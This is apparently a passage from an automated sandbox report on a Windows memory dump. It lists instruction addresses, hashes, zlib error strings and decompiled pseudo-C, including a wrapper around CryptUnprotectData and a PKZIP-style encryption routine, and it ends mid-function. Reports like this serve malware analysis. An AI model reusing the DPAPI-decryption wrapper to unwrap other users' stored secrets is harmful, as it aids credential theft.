0x00407e52
0x00407e55
0x00407e55
0x00407e58
0x00407e5b
0x00407e48
0x00407e4a
0x00407e4c
0x00407e4d
0x00407e4d
0x00407e5d
0x00407e60
0x00407e63
0x00407e65
0x00407e68
0x00407e6a
0x00407e6c
0x00407e6f
0x00407e78
0x00407e7b
0x00407e7b
0x00407e71
0x00407e73
0x00407e73
0x00407e7d
0x00407e7d
0x00407e6a
0x00407e80
0x00407e82
0x004083b6
0x004083b9
0x004083bc
0x004083bf
0x004083c2
0x004083c5
0x004083c7
0x004083c9
0x004083cb
0x004083ce
0x004083d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e02
0x00407e02
0x00407e05
0x00407e08
0x00407e0a
0x00000000
0x00407e0c
0x00407e0c
0x00407e0f
0x00407e19
0x00407e19
0x00407e1b
0x00407e1d
0x00407e11
0x00407e11
0x00407e13
0x00407e14
0x00407e14
0x00407e20
0x00407e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00407e22
0x00407e0a
0x00407e00
0x00407df4
0x00000000
0x00000000
0x00407ee8
0x00407eeb
0x00407f25
0x00407f25
0x00407f2a
0x00407f2c
0x00407f2f
0x00407f32
0x00407f35
0x00408424
0x00408424
0x0040842a
0x00000000
0x00407f3b
0x00407f3b
0x00407f3e
0x00407f41
0x00407f44
0x00000000
0x00407f4a
0x00407f4a
0x00407f4d
0x00407f54
0x00407f57
0x00407f59
0x00407f5a
0x00407f5b
0x00407f5d
0x00407f60
0x00407f63
0x00407f65
0x00000000
0x00407f6b
0x00407f6b
0x00407f6f
0x00407f72
0x00407f72
0x00407f75
0x00407f7c
0x00000000
0x00407f7c
0x00407f65
0x00407f44
0x00407eed
0x00407eed
0x00407ef2
0x00407ef2
0x00407ef6
0x00000000
0x00000000
0x00407efc
0x00407eff
0x00407f02
0x00407f05
0x00407f07
0x00407f09
0x00407f0e
0x00407f11
0x00407f14
0x00407f16
0x00407f1d
0x00407f20
0x00407f23
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407f23
0x00000000
0x00407ef2
0x00000000
0x00000000
0x00407f82
0x00407f85
0x00407f88
0x00407f8b
0x00407f8e
0x00408003
0x00408003
0x00408007
0x00408009
0x00408010
0x00408010
0x00408013
0x0040801a
0x0040801d
0x00408024
0x00408027
0x00408027
0x00408010
0x00408032
0x00408035
0x00408038
0x0040803e
0x00408044
0x0040804c
0x0040804f
0x00408051
0x00408465
0x00408469
0x0040846b
0x0040846e
0x00408471
0x00408474
0x00408475
0x00408476
0x00408478
0x0040847b
0x0040847b
0x00408481
0x00408484
0x00408487
0x0040848a
0x0040848d
0x00408490
0x00408493
0x00408495
0x00408497
0x00408499
0x0040849c
0x00000000
0x00408057
0x00408057
0x0040805a
0x0040805d
0x00000000
0x0040805d
0x00407f90
0x00407f90
0x00407f90
0x00407f93
0x00000000
0x00407f95
0x00407f95
0x00407fa0
0x00407fa0
0x00407fa4
0x00000000
0x00000000
0x00407faa
0x00407fad
0x00407fb0
0x00407fb3
0x00407fb5
0x00407fb7
0x00407fbc
0x00407fbf
0x00407fc2
0x00407fc4
0x00407fcb
0x00407fce
0x00407fd1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407fd1
0x00000000
0x00407fa0
0x00000000
0x00407fd3
0x00407fd3
0x00407fd6
0x00407fdd
0x00407fe3
0x00407fe6
0x00407fe9
0x00407fec
0x00407fef
0x00407ff2
0x00407ff5
0x00407ff8
0x00407ffb
0x00407ffe
0x00407ffe
0x00000000
0x00407f90
0x00000000
0x00000000
0x00408063
0x00408063
0x00408068
0x0040806b
0x0040806e
0x00408071
0x00408078
0x0040807b
0x00408202
0x00408202
0x00408205
0x0040820a
0x0040820e
0x00408216
0x0040821d
0x00408222
0x00408226
0x0040822b
0x00408231
0x00408238
0x0040823f
0x00408246
0x0040824e
0x00408251
0x00408253
0x004084f0
0x004084f4
0x004084f6
0x004084f9
0x004084fc
0x004084ff
0x00408500
0x00408501
0x00408503
0x00408506
0x00408506
0x0040850c
0x0040850f
0x00408512
0x00408515
0x00408518
0x0040851b
0x0040851e
0x00408523
0x00408526
0x00408526
0x00408526
0x00408529
0x0040852b
0x00408530
0x00408541
0x00408259
0x00408259
0x0040825c
0x0040825f
0x00408261
0x00408263
0x00408264
0x00408266
0x00408269
0x0040826b
0x0040840e
0x0040840e
0x00408411
0x00408414
0x00408417
0x0040841a
0x0040841d
0x00000000
0x00408271
0x00408271
0x00408277
0x0040827a
0x0040827d
0x00408280
0x00408283
0x00408289
0x0040828c
0x0040828f
0x00408292
0x00408295
0x00408298
0x0040829b
0x0040829c
0x0040829d
0x0040829f
0x004082a2
0x00000000
0x004082a2
0x0040826b
0x00408081
0x00408081
0x0040808b
0x0040808b
0x0040808e
0x00408090
0x00000000
0x00000000
0x00000000
0x00000000
0x00408092
0x00408092
0x00408092
0x00408096
0x00000000
0x00000000
0x0040809c
0x004080a2
0x004080a5
0x004080a7
0x004080a9
0x004080ac
0x004080af
0x004080b6
0x004080b8
0x004080bd
0x004080c0
0x004080c3
0x004080c5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004080c5
0x004083d7
0x004083d7
0x004083da
0x004083dd
0x004083e0
0x004083e3
0x004083e8
0x004083eb
0x004083eb
0x004083eb
0x004083ee
0x004083f0
0x004083f4
0x004083fc
0x0040840d
0x00000000
0x004080c7
0x004080c7
0x004080ce
0x004080d3
0x004080d6
0x004080da
0x004080dd
0x004080e0
0x004080e3
0x004080e6
0x00408105
0x00408108
0x00408113
0x00408116
0x0040810a
0x0040810a
0x0040810a
0x00408119
0x0040811b
0x00408121
0x00408128
0x0040812b
0x0040812e
0x00408131
0x00408134
0x00408136
0x00408173
0x00408173
0x00408176
0x00408178
0x00408182
0x00408184
0x00408187
0x0040818c
0x0040818e
0x00408191
0x00408194
0x00408199
0x0040819c
0x0040819f
0x004081a2
0x004081ac
0x004081ae
0x004081b0
0x004084a2
0x004084a2
0x004084a5
0x004084a8
0x004084ab
0x004084ac
0x004084ad
0x004084af
0x004084b2
0x004084b5
0x004084b8
0x004084be
0x004084c5
0x004084c8
0x004084cb
0x004084cd
0x004084d1
0x004084d1
0x004084d1
0x004084d4
0x004084d7
0x004084db
0x004084de
0x004084ef
0x004081b6
0x004081b6
0x004081ba
0x004081ce
0x004081ce
0x00000000
0x004081bc
0x004081bc
0x004081bf
0x00000000
0x004081c5
0x004081c5
0x004081c8
0x004081d0
0x004081d0
0x004081d0
0x004081d3
0x004081d6
0x004081d7
0x004081d7
0x004081d7
0x004081d7
0x004081dc
0x004081df
0x00000000
0x004081df
0x004081bf
0x004081ba
0x00408138
0x00408138
0x00408140
0x00408140
0x00408144
0x00000000
0x00000000
0x0040814a
0x0040814d
0x00408150
0x00408153
0x00408155
0x00408157
0x0040815c
0x0040815f
0x00408162
0x00408164
0x0040816b
0x0040816e
0x00408171
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408171
0x00408348
0x0040834b
0x0040834e
0x0040834e
0x00408351
0x00408356
0x00408358
0x0040835d
0x00408364
0x00000000
0x00408364
0x004080e8
0x004080e8
0x004080ea
0x004080ec
0x004080ef
0x004080f2
0x004080f5
0x004080f8
0x004080fd
0x004081e4
0x004081e4
0x004081e9
0x004081ec
0x004081ef
0x004081f2
0x004081f9
0x004081fc
0x00408088
0x0040808b
0x0040808e
0x00408090
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004081fc
0x00000000
0x004080e6
0x0040808b
0x00000000
0x00000000
0x004082a8
0x004082a8
0x004082ab
0x004082ae
0x004082b1
0x004082b4
0x004082b7
0x004082ba
0x004082bf
0x004082c2
0x004082c5
0x004082c7
0x004082cc
0x004082cf
0x004082d7
0x004082da
0x00000000
0x004082e0
0x004082e0
0x004082e3
0x004082e6
0x004082e9
0x004082ea
0x004082eb
0x004082f4
0x004082f7
0x004082fa
0x004082fc
0x004082ff
0x00408302
0x00408305
0x00408308
0x0040830b
0x0040830e
0x00408311
0x00408314
0x00408316
0x0040831d
0x00408320
0x00408320
0x00408318
0x00408318
0x0040831a
0x0040831a
0x00408322
0x00408326
0x00408329
0x00408542
0x00000000
0x0040832f
0x0040832f
0x00000000
0x0040832f
0x00408329
0x00000000
0x00000000
0x00408548
0x00408548
0x0040854b
0x00408551
0x00408554
0x00408559
0x0040855f
0x00408562
0x00408565
0x0040859a
0x00000000
0x00408567
0x00408567
0x0040856a
0x0040856d
0x00408570
0x00408573
0x00408576
0x00408579
0x0040857b
0x0040857d
0x0040857f
0x00408582
0x00408582
0x00408582
0x00408585
0x00408588
0x00408599
0x00408599
0x00000000
0x00000000
0x004085a0
0x004085a0
0x004085a3
0x004085a6
0x004085a9
0x004085ac
0x004085af
0x00000000
0x00000000
0x00408431
0x00408431
0x00408434
0x00408437
0x0040843a
0x0040843d
0x00408442
0x00408446
0x00408446
0x00408446
0x00408449
0x0040844b
0x0040844f
0x00408453
0x00408464
0x00000000
0x00000000
0x00407d06
0x00407d06
0x00407d0b
0x00407d11
0x00407d13
0x00407d15
0x00407d1b
0x00000000
0x00000000
0x00407d23
0x00407d32
0x00407d3a
0x00407d3d
0x00407d3f
0x0040836a
0x00000000
0x00407d45
0x00407d45
0x00407d49
0x00407d4c
0x00408335
0x00408335
0x00000000
0x00408335
0x00000000
0x00000000
0x00407d57
0x00407d57
0x00407d5a
0x00407d5d
0x00407d60
0x00000000
0x00000000
0x00408371
0x00408374
0x00408377
0x0040837d
0x00408384
0x00408387
0x0040838d
0x00408390
0x00408393
0x00000000
0x00000000
0x00408338
0x00408338
0x0040833a
0x00000000
0x00407c6a
0x00407c6a
0x00407c6a
0x00407c6c
0x00407c72
0x00407c75
0x00407c78
0x00407c7b
0x00407c7b
0x00407c80
0x00407c82
0x00407c84
0x00407c87
0x00407c8a
0x00407c8b
0x00407c8c
0x00407c9d
0x00407c9d
0x00000000

Strings

invalid stored block lengths, xrefs: 004083A8
too many length or distance symbols, xrefs: 0040842A
invalid bit length repeat, xrefs: 004084BE

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: invalid bit length repeat$invalid stored block lengths$too many length or distance symbols
API String ID: 0-949635641
Opcode ID: 398f7677aa7ed48e56b9da44981c6ad68fad4367904111b6fa7224b32f423e87
Instruction ID: c9166253b2e5c2b63da2e9b8aeb7cbad9ea7cfaaad1ea2b2b9c1e0e8152cef7e
Opcode Fuzzy Hash: 398f7677aa7ed48e56b9da44981c6ad68fad4367904111b6fa7224b32f423e87
Instruction Fuzzy Hash: 8A624CB1A00605DFCB14CF69C590AAAB7F1FF88310F10856EE85A9B785E774E941CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00415180 Relevance: 4.6, APIs: 3, Instructions: 54
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00415180(void* __eflags, intOrPtr _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				char _t23;
				void* _t24;

				_t23 = _a8;
				_t21 = _a4;
				E0042B8D0(E0042BDF8(_t19, _t21, _t23, _t23), _t21, _t23);
				_v8 = _t21;
				_v12 = _t23;
				_t24 = E0042BDF8(_t19, _t21, _t23, _t23);
				_push( &_v20);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				if( *0x464768() == 0) {
					return 0;
				} else {
					_t22 = _v20;
					if(_t22 != 0) {
						E0042B8D0(_t24, _v16, _t22);
					}
					 *((char*)(_t22 + _t24)) = 0;
					return _t24;
				}
			}

0x00415187
0x0041518b
0x0041519a
0x004151a0
0x004151a3
0x004151ae
0x004151b3
0x004151b4
0x004151b6
0x004151b8
0x004151ba
0x004151bc
0x004151c1
0x004151ca
0x004151f4
0x004151cc
0x004151cc
0x004151d1
0x004151d9
0x004151de
0x004151e1
0x004151ec
0x004151ec

APIs

_malloc.LIBCMT ref: 00415191

Part of subcall function 0042BDF8: __FF_MSGBANNER.LIBCMT ref: 0042BE11
Part of subcall function 0042BDF8: __NMSG_WRITE.LIBCMT ref: 0042BE18
Part of subcall function 0042BDF8: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,0042C560,?), ref: 0042BE3D

_malloc.LIBCMT ref: 004151A6
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004151C2

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _malloc$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 1951378374-0
Opcode ID: 50741e7eeae3a059c943917afb75b02a5b1035da75c4430cfbb36fbca9af03af
Instruction ID: 2f32f89580c1cc1f4e46747725e4da6a71367bb80f60b3e6ff5fe298cf1b5279
Opcode Fuzzy Hash: 50741e7eeae3a059c943917afb75b02a5b1035da75c4430cfbb36fbca9af03af
Instruction Fuzzy Hash: E301A772E01128B7DB11AAA9AC01AEFB77CDFC1710F54015BF818D3201E775AA1083E6

Uniqueness

Uniqueness Score: -1.00%

Function 00426EB0 Relevance: 1.6, APIs: 1, Instructions: 132
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00426EB0(void* __ecx, signed int _a4, long _a8) {
				signed char _v8;
				void* __edi;
				void* __esi;
				void* _t47;
				intOrPtr _t54;
				signed int _t56;
				void* _t65;
				void* _t74;
				void* _t76;
				signed char _t80;
				signed char _t85;
				unsigned int _t89;
				void* _t94;
				long _t102;
				unsigned int _t107;
				void* _t110;
				void* _t115;

				_push(__ecx);
				_t68 = _a4;
				_t110 = __ecx;
				_t102 = _a8;
				_t47 = _a4;
				if( *((char*)(__ecx + 0x2d)) == 0) {
					L10:
					_t95 =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t76 =  *(_t110 + 4);
						__eflags = _t76;
						if(_t76 == 0) {
							 *((intOrPtr*)(_t110 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						} else {
							WriteFile(_t76, _t47, _t102,  &_a8, 0);
							return _a8;
						}
					} else {
						_t77 =  *(_t110 + 0x24);
						if( *(_t110 + 0x24) + _t102 <  *((intOrPtr*)(_t110 + 0x28))) {
							E0042B8D0(_t77 + _t95, _t47, _t102);
							_t41 = _t110 + 0x24;
							 *_t41 =  *(_t110 + 0x24) + _t102;
							__eflags =  *_t41;
							return _t102;
						} else {
							 *((intOrPtr*)(_t110 + 0x14)) = 0x30000;
							return 0;
						}
					}
				} else {
					_t54 =  *((intOrPtr*)(__ecx + 0x3c));
					if(_t54 != 0 &&  *((intOrPtr*)(__ecx + 0x40)) < _t102) {
						_push(_t54);
						E0042A289();
						_t115 = _t115 + 4;
						 *(_t110 + 0x3c) = 0;
					}
					_t120 =  *(_t110 + 0x3c);
					if( *(_t110 + 0x3c) == 0) {
						_push(_t102 + _t102);
						_t65 = E0042C541(_t94, _t102, _t110, _t120);
						_t115 = _t115 + 4;
						 *(_t110 + 0x3c) = _t65;
						 *(_t110 + 0x40) = _t102;
					}
					E0042B8D0( *(_t110 + 0x3c), _t68, _t102);
					_t115 = _t115 + 0xc;
					_t74 = 0;
					if(_t102 == 0) {
						L9:
						_t47 =  *(_t110 + 0x3c);
						goto L10;
					} else {
						do {
							_t80 =  *((intOrPtr*)(_t74 +  *(_t110 + 0x3c)));
							_t107 =  *(_t110 + 0x30);
							_a4 = _t80;
							_v8 =  *(0x446da8 + ((_t80 ^ _t107) & 0x000000ff) * 4);
							_t56 =  *(_t110 + 0x38);
							_v8 = _v8 ^ _t107 >> 0x00000008;
							_t85 = _v8;
							 *(_t110 + 0x30) = _t85;
							_t89 = 1 + ((_t85 & 0x000000ff) +  *(_t110 + 0x34)) * 0x8088405;
							 *(_t110 + 0x34) = _t89;
							 *(_t110 + 0x38) = _t56 >> 0x00000008 ^  *(0x446da8 + ((_t89 >> 0x00000018 ^ _t56) & 0x000000ff) * 4);
							_t74 = _t74 + 1;
							 *(_t74 +  *(_t110 + 0x3c) - 1) = ((_t56 & 0x0000fffd | 0x00000002) ^ 0x00000001) * (_t56 & 0x0000fffd | 0x00000002) >> 0x00000008 ^ _a4;
						} while (_t74 < _a8);
						_t102 = _a8;
						goto L9;
					}
				}
			}

0x00426eb3
0x00426eb5
0x00426eb9
0x00426ec0
0x00426ec3
0x00426ec5
0x00426f9b
0x00426f9b
0x00426fa0
0x00426fda
0x00426fdd
0x00426fdf
0x00426ffd
0x00427005
0x0042700b
0x00426fe1
0x00426fea
0x00426ff9
0x00426ff9
0x00426fa2
0x00426fa2
0x00426fab
0x00426fc4
0x00426fcc
0x00426fcc
0x00426fcc
0x00426fd7
0x00426fad
0x00426fae
0x00426fbc
0x00426fbc
0x00426fab
0x00426ecb
0x00426ecb
0x00426ed0
0x00426ed7
0x00426ed8
0x00426edd
0x00426ee0
0x00426ee0
0x00426ee7
0x00426eeb
0x00426ef0
0x00426ef1
0x00426ef6
0x00426ef9
0x00426efc
0x00426efc
0x00426f05
0x00426f0a
0x00426f0d
0x00426f11
0x00426f98
0x00426f98
0x00000000
0x00426f17
0x00426f17
0x00426f1a
0x00426f1d
0x00426f20
0x00426f35
0x00426f38
0x00426f3e
0x00426f41
0x00426f44
0x00426f55
0x00426f56
0x00426f74
0x00426f8b
0x00426f8c
0x00426f90
0x00426f95
0x00000000
0x00426f95
0x00426f11

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,00427575,?,00000000,?,00004000,00000000), ref: 00426FEA

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: bcf9bf85dbe5c438bea850ba4b79c20f3c6223bc2446e519ac08749a3821d850
Instruction ID: f7c4dc0a241c1ffd5c37abe6c339c7b57fd21272638252aff9d216f6511a05bf
Opcode Fuzzy Hash: bcf9bf85dbe5c438bea850ba4b79c20f3c6223bc2446e519ac08749a3821d850
Instruction Fuzzy Hash: 1D41DE727007149BCB64DF29E991A67F7E9FB85310B95852FE88687B00D235F900CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00435F17 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435F17() {

				SetUnhandledExceptionFilter(E00435ED5);
				return 0;
			}

0x00435f1c
0x00435f24

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00035ED5), ref: 00435F1C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 416f9f0de9155fd1cccf2d5ef2ad5fe0114d6f5e8dbc25a85d2cfa9ecbf07d09
Instruction ID: 6a509233918905699dde8cf216f623a0f3798a3bc67ed6961a7aea5dac8683f8
Opcode Fuzzy Hash: 416f9f0de9155fd1cccf2d5ef2ad5fe0114d6f5e8dbc25a85d2cfa9ecbf07d09
Instruction Fuzzy Hash: 289002742915414AC7085770AD0A70526D45A5D612B6154666721D4494EFB441106519

Uniqueness

Uniqueness Score: -1.00%

Function 00407C9E Relevance: .5, Instructions: 453
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E00407C9E(intOrPtr* __ebx, void* __ecx, intOrPtr __edi, void* __esi) {
				intOrPtr* _t389;
				intOrPtr _t397;
				void* _t399;

				_t399 = __esi;
				_t397 = __edi;
				_t389 = __ebx;
				do {
					switch( *((intOrPtr*)(__ecx * 4 +  &M004085B8))) {
						case 0:
							__eflags = __edi - 3;
							if(__edi >= 3) {
								L11:
								__ecx = __eax;
								__ecx = __eax & 0x00000007;
								__edx = __ecx;
								__edx = __ecx & 0x00000001;
								__ecx = __ecx >> 1;
								__esi[6] = __edx;
								__eflags = __ecx - 3;
								if(__ecx > 3) {
									goto L101;
								} else {
									switch( *((intOrPtr*)(__ecx * 4 +  &M004085E0))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											goto L16;
										case 3:
											goto L106;
									}
								}
							} else {
								__ecx = 1;
								while(1) {
									__eflags =  *(__ebp - 8);
									if( *(__ebp - 8) == 0) {
										goto L103;
									}
									 *(__ebp - 8) =  *(__ebp - 8) - __ecx;
									__ecx =  *(__ebp - 4);
									__edx =  *( *(__ebp - 4)) & 0x000000ff;
									__ecx = __edi;
									__edx = ( *( *(__ebp - 4)) & 0x000000ff) << __cl;
									__ecx = 1;
									 *(__ebp - 4) =  *(__ebp - 4) + 1;
									__edi = __edi + 8;
									__eax = __eax | ( *( *(__ebp - 4)) & 0x000000ff) << __cl;
									 *(__ebp + 0x10) = 0;
									 *(__ebp + 0xc) = __eax;
									__eflags = __edi - 3;
									if(__edi < 3) {
										continue;
									} else {
										goto L11;
									}
									goto L127;
								}
								goto L103;
							}
							goto L127;
						case 1:
							__eflags = __edi - 0x20;
							if(__edi >= 0x20) {
								L21:
								__ecx = __eax;
								__eax =  !__eax;
								__ecx = __ecx & 0x0000ffff;
								__eax = __eax >> 0x10;
								__eflags = __eax - __ecx;
								if(__eax != __ecx) {
									 *__esi = 9;
									__ebx[6] = "invalid stored block lengths";
									_push(0xfffffffd);
									goto L2;
								} else {
									__eax = 0;
									__edi = 0;
									__esi[1] = __ecx;
									 *(__ebp + 0xc) = 0;
									__eflags = __ecx;
									if(__ecx == 0) {
										__esi[6] =  ~(__esi[6]);
										asm("sbb ecx, ecx");
										__ecx =  ~(__esi[6]) & 0x00000007;
										 *__esi =  ~(__esi[6]) & 0x00000007;
									} else {
										__ecx = 2;
										 *__esi = 2;
									}
									goto L101;
								}
							} else {
								__ecx = 1;
								while(1) {
									__eflags =  *(__ebp - 8);
									if( *(__ebp - 8) == 0) {
										goto L107;
									}
									 *(__ebp - 8) =  *(__ebp - 8) - __ecx;
									__ecx =  *(__ebp - 4);
									__edx =  *( *(__ebp - 4)) & 0x000000ff;
									__ecx = __edi;
									__edx = ( *( *(__ebp - 4)) & 0x000000ff) << __cl;
									__ecx = 1;
									 *(__ebp - 4) =  *(__ebp - 4) + 1;
									__edi = __edi + 8;
									__eax = __eax | ( *( *(__ebp - 4)) & 0x000000ff) << __cl;
									 *(__ebp + 0x10) = 0;
									 *(__ebp + 0xc) = __eax;
									__eflags = __edi - 0x20;
									if(__edi < 0x20) {
										continue;
									} else {
										goto L21;
									}
									goto L127;
								}
								goto L107;
							}
							goto L127;
						case 2:
							__eflags =  *(__ebp - 8);
							if( *(__ebp - 8) == 0) {
								L107:
								__eax =  *(__ebp + 0xc);
								__esi[8] =  *(__ebp + 0xc);
								goto L104;
							} else {
								__eflags = __edx;
								if(__edx != 0) {
									L43:
									__eax = __esi[1];
									__ecx =  *(__ebp - 8);
									 *(__ebp + 0x10) = 0;
									 *(__ebp - 0xc) = __eax;
									__eflags = __eax - __ecx;
									if(__eax > __ecx) {
										__eax = __ecx;
										 *(__ebp - 0xc) = __ecx;
									}
									__ecx =  *(__ebp - 0x10);
									__eflags = __eax - __ecx;
									if(__eax > __ecx) {
										 *(__ebp - 0xc) = __ecx;
									}
									__edx =  *(__ebp - 0xc);
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp + 8);
									__eax = E0042B8D0( *(__ebp + 8),  *(__ebp - 4),  *(__ebp - 0xc));
									__eax =  *(__ebp - 0xc);
									 *(__ebp - 4) =  *(__ebp - 4) + __eax;
									 *(__ebp - 8) =  *(__ebp - 8) - __eax;
									 *(__ebp + 8) =  *(__ebp + 8) + __eax;
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __eax;
									_t86 =  &(__esi[1]);
									 *_t86 = __esi[1] - __eax;
									__eflags =  *_t86;
									if( *_t86 == 0) {
										__esi[6] =  ~(__esi[6]);
										asm("sbb edx, edx");
										__edx =  ~(__esi[6]) & 0x00000007;
										 *__esi =  ~(__esi[6]) & 0x00000007;
									}
									goto L100;
								} else {
									__edx = __esi[0xb];
									__eflags =  *(__ebp + 8) - __edx;
									if( *(__ebp + 8) != __edx) {
										L33:
										__ecx =  *(__ebp + 0x10);
										__eax =  *(__ebp + 8);
										__esi[0xd] =  *(__ebp + 8);
										__eax = E00404E70( *(__ebp + 0x10), __esi, __ebx,  *(__ebp + 0x10));
										__ecx = __esi[0xc];
										 *(__ebp + 0x10) = __eax;
										__eax = __esi[0xd];
										 *(__ebp + 8) = __eax;
										__eflags = __eax - __ecx;
										if(__eax >= __ecx) {
											__eax = __esi[0xb];
											__eax = __esi[0xb] -  *(__ebp + 8);
											__eflags = __eax;
											 *(__ebp - 0x10) = __eax;
											__edx = __eax;
										} else {
											__ecx = __ecx - __eax;
											__edx = __ecx - __eax - 1;
											 *(__ebp - 0x10) = __edx;
										}
										__eax = __esi[0xb];
										__eflags =  *(__ebp + 8) - __esi[0xb];
										if( *(__ebp + 8) == __esi[0xb]) {
											__eax = __esi[0xa];
											__eflags = __eax - __ecx;
											if(__eflags != 0) {
												 *(__ebp + 8) = __eax;
												if(__eflags >= 0) {
													__edx = __esi[0xb];
													__edx = __esi[0xb] - __eax;
													__eflags = __edx;
												} else {
													__edx = __ecx - 1;
												}
												 *(__ebp - 0x10) = __edx;
											}
										}
										__eflags = __edx;
										if(__edx == 0) {
											__ecx =  *(__ebp + 0xc);
											__eax =  *(__ebp - 4);
											__edx =  *(__ebp - 8);
											__esi[8] =  *(__ebp + 0xc);
											__esi[7] = __edi;
											__ecx = __eax;
											__ecx = __eax -  *__ebx;
											 *__ebx = __eax;
											__eax =  *(__ebp + 0x10);
											__ebx[1] =  *(__ebp - 8);
											_push( *(__ebp + 0x10));
											goto L4;
										} else {
											goto L43;
										}
									} else {
										__eax = __esi[0xc];
										__ecx = __esi[0xa];
										__eflags = __ecx - __eax;
										if(__eflags == 0) {
											goto L33;
										} else {
											 *(__ebp + 8) = __ecx;
											if(__eflags >= 0) {
												__edx = __edx - __ecx;
												__eflags = __edx;
												__eax = __edx;
												 *(__ebp - 0x10) = __edx;
											} else {
												__eax = __eax - __ecx;
												__eax = __eax - 1;
												 *(__ebp - 0x10) = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L43;
											} else {
												goto L33;
											}
										}
									}
								}
							}
							goto L127;
						case 3:
							__eflags = __edi - 0xe;
							if(__edi >= 0xe) {
								L53:
								__eax = __eax & 0x00003fff;
								__ecx = __eax;
								__ecx = __eax & 0x0000001f;
								__esi[1] = __eax;
								__eflags = __ecx - 0x1d;
								if(__ecx > 0x1d) {
									L112:
									 *__esi = 9;
									__ebx[6] = "too many length or distance symbols";
									goto L113;
								} else {
									__eax = __eax >> 5;
									__eax = __eax & 0x0000001f;
									__eflags = __eax - 0x1d;
									if(__eax > 0x1d) {
										goto L112;
									} else {
										__edx = __ebx[8];
										__eax = __eax + __ecx + 0x102;
										__ecx = __ebx[0xa];
										_push(4);
										_push(__eax);
										_push(__ecx);
										__eax =  *(__ebx[8])();
										__esp = __esp + 0xc;
										__esi[3] = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											goto L111;
										} else {
											 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0xe;
											__eax =  *(__ebp + 0xc);
											__edi = __edi - 0xe;
											__eflags = __edi;
											__esi[2] = 0;
											 *__esi = 4;
											goto L57;
										}
									}
								}
							} else {
								__ecx = 1;
								while(1) {
									__eflags =  *(__ebp - 8);
									if( *(__ebp - 8) == 0) {
										goto L110;
									}
									 *(__ebp - 8) =  *(__ebp - 8) - __ecx;
									__ecx =  *(__ebp - 4);
									__edx =  *( *(__ebp - 4)) & 0x000000ff;
									__ecx = __edi;
									__edx = ( *( *(__ebp - 4)) & 0x000000ff) << __cl;
									__ecx = 1;
									 *(__ebp - 4) =  *(__ebp - 4) + 1;
									__edi = __edi + 8;
									__eax = __eax | ( *( *(__ebp - 4)) & 0x000000ff) << __cl;
									 *(__ebp + 0x10) = 0;
									 *(__ebp + 0xc) = __eax;
									__eflags = __edi - 0xe;
									if(__edi < 0xe) {
										continue;
									} else {
										goto L53;
									}
									goto L127;
								}
								goto L110;
							}
							goto L127;
						case 4:
							L57:
							__esi[1] = __esi[1] >> 0xa;
							__ecx = (__esi[1] >> 0xa) + 4;
							__eflags = __esi[2] - (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								L63:
								__eflags = __esi[2] - 0x13;
								if(__esi[2] < 0x13) {
									__eax = 1;
									do {
										__ecx = __esi[2];
										__edx =  *(0x444de0 + __esi[2] * 4);
										__ecx = __esi[3];
										 *(__esi[3] +  *(0x444de0 + __esi[2] * 4) * 4) = 0;
